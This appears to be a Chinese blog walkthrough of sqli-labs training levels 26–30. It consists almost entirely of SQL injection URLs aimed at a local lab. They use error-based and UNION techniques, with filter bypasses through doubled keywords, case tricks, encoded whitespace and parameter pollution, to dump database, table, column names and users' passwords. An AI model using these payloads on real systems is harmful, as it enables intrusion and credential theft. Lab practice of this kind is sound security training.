sqli-labs靶场通关攻略 26-30

主页有sqli-labs靶场通关攻略 1-25

第二六关 less-26

步骤一:输入?id=1 发现逻辑运算符,注释符以及空格给过滤了

步骤二:?id=1 and'闭合,转换:逻辑运算符使用双写或者&&和||替换,空格用括号替换

步骤三:查询数据库名

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(database()))),1))||%27

步骤四:查看表名

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=%27security%27))),1))||%27

步骤五:查看users表中的列名

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=%27security%27aandnd(table_name=%27users%27)))),1))||%27

步骤六:查看信息

http://127.0.0.1/Less-26/?id=1%27||(updatexml(1,concat(1,(select(group_concat(passwoorrd,username))from(users))),1))||%27

第二七关 less-27

步骤一:过滤了空格,select和union大小写绕过,%09代替空格

查数据库

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09database())),1)and%27

步骤二:查看表名

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=%27security%27)),1)and%27

步骤三:查看users表中列名

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=%27security%27%09and%09table_name=%27users%27)),1)and%27

步骤四:查看users表中信息

http://127.0.0.1/less-27/?id=1%27and%09updatexml(1,concat(1,(sElect%09group_concat(username,password)%09from%09users)),1)and%27

第二八关 less-28

过滤了空格,union和select,空格用%0A替换,union select双写替换

步骤一:查询数据库

http://127.0.0.1/less-28/?id=0%27)%20%0aunionunion%20%0a%20select%0aselect%20%0a%201,2,database();%00

步骤二:查询表名

http://127.0.0.1/less-28/?id=99%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema=%27security%27and%20(%271

步骤三:查看users表中列名

http://127.0.0.1/less-28/?id=99%27)uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema=%27security%27%0Aand%0Atable_name=%27users%27%0Aand(%271

第二九关 less-29

步骤一:查看数据库名

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,database(),3%20--+

步骤二:查看表名

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

步骤三:查看users表中列名

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

步骤四:查看信息

http://127.0.0.1/less-29/?id=1&id=-1%27union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第三十关 less-30

29关和30关闭合方式不同

步骤一:查看数据库名

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,database(),3%20--+

 步骤二:查看表名

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

 步骤三:查看users表中列名

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

 步骤四:查看信息

http://127.0.0.1/less-30/?id=1&id=-1%22union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值